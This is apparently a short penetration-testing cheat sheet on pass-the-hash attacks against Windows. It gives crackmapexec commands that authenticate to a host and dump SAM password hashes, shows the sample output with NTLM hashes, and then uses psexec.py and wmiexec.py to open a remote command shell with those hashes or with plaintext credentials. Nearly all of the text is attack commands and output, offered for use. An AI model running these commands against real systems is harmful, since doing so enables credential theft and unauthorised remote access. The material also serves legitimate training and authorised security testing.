Pass The Hash

Windows

If you have a user with max privileges, you could retrieve SAM hashes (users passwords):

crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD'

...
SMB         10.10.10.10    445    LOCAL       [+] local\USERNAME:PASSWORD (Pwn3d!)

So you can use crackmapexec too:

crackmapexec smb 10.10.10.10 -u 'USERNAME' -p 'PASSWORD' --sam

...Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
...USERNAME:1000:aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5:::
...user3$:1002:aad3b435b51404eeaad3b435b51404ee:ed3c759dafa8d554e038c2152aa67cb3:::
...user1:1003:aad3b435b51404eeaad3b435b51404ee:3a7ac3205a1b5d1fcd63fb5d509a6d67:::

With those hashes we can obtain a CMD using several tools:

psexec.py USERNAME@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5
wmiexec.py USERNAME@10.10.10.10 -hashes aad3b435b51404eeaad3b435b51404ee:c1741694e7586153e6f4f49463be8ec5

Or simply with credentials:

psexec.py USERNAME:PASSWORD@10.10.10.10
wmiexec.py USERNAME:PASSWORD@10.10.10.10